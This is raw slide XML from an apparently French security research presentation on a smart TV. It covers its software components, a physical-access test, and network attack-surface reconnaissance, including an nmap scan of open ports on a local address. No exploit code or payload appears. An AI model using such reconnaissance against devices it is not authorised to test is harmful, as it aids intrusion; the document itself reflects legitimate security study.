              <a:t> ~40Mo : interface utilisateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tvmain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> ~60Mo : cœur du système</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>utilisateur avec peu de droit : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3AE49C-B0FC-D4FC-166C-05BF814C9611}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E7EEC6-42A2-CC96-6943-304A662D31E9}"/>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2EF42055-A7A1-12C7-81C4-CCACDA0F8863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Results</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ED2A26A-FD2F-A110-8473-AE6F3C3BC85B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6379E446-BA17-9D03-30F1-ABCF4363DBD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Résultat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B93E22E8-2C9C-B8DB-5780-CC0915CDB7A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5779109" y="702580"/>
            <a:ext cx="2999765" cy="4083014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167967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EF3E7E-B45A-D06D-3DD9-D9EA0A6A6EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D6EF8B8-56CB-EB5C-0734-633E7EF25DF4}"/>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88EF88BA-9C4E-DC03-657D-77A8B208B2C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Recherche de vulnérabilités</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882DA5A7-B4F2-DED6-B333-AC5940D65FCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB813FD8-96CC-DC9A-336A-E1A563F2AEAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{646989D8-E3AC-4C14-B695-557095CD5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029" y="1579458"/>
            <a:ext cx="4572000" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2821720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FC633DF-B30E-9E21-57C7-3CCA33447DAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD9F9D25-8E1E-5CD6-DA39-AF6FC27913FE}"/>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3F7BF3AA-098A-E1F2-E804-955F84D222E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Scénario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF0F8BE8-DA38-0D9C-EC55-47CC3A82BDCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Recherche de vulnérabilités</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43C8C074-4F58-1B1E-BF80-1C49634D2C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surface d’attaque réseau</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Image 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AF16A01-4FAE-9BF4-CB46-94D4169A17AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="12592"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1664970" y="2917608"/>
            <a:ext cx="1061374" cy="1001937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Router Icon in Coreui Free">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EAEF370-3A26-E5B0-D76E-6CE692ADB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859" y="1315427"/>
            <a:ext cx="942021" cy="942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ône Téléviseur, tv, moderne, écran dans televisions">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41AA8E1-D1EB-D30D-01A2-B9672147E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481" y="2430780"/>
            <a:ext cx="2967244" cy="18259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2FFF747-A45F-81B1-C2CC-FA875683D981}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556385" y="3992880"/>
            <a:ext cx="1278544" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>192.168.1.48</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="ZoneTexte 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D160D86-A176-73DC-DE84-FAA4E7CD6EFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6398831" y="4248251"/>
            <a:ext cx="1278544" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>192.168.1.67</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="ZoneTexte 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED87D3C-048E-AF28-D4DF-AF5F245B414B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3644597" y="2160371"/>
            <a:ext cx="1278544" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>192.168.1.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1027544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D861942-D6FE-6889-75D0-E9B95EBF6B31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{370DE351-3C5E-E0FA-5C32-3A51B6947FDF}"/>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90A875EB-47AB-5E5A-7B2B-03EC430A5D92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surface d’attaque réseau</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D421CA8-7B17-97D4-F989-54CE279ACF7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Recherche de vulnérabilités</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DB88039-3093-098E-71F9-756306AB5B33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surface d’attaque réseau</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71E22955-7B6A-5E3E-52D7-38D4B393B3A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382895" y="1312967"/>
            <a:ext cx="4387225" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> scan report for Host-001 (192.168.1.67)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> up (0.0043s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>latency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 65524 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>closed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PORT      STATE SERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1969/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  open  lipsinc1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4444/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  open  krb524</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7681/</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10001/</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scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-config</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>36668/</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36669/</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38400/</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39500/</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45473/</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56789/</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56790/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unknown</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 10:C7:53:D9:0B:FE (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unknown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
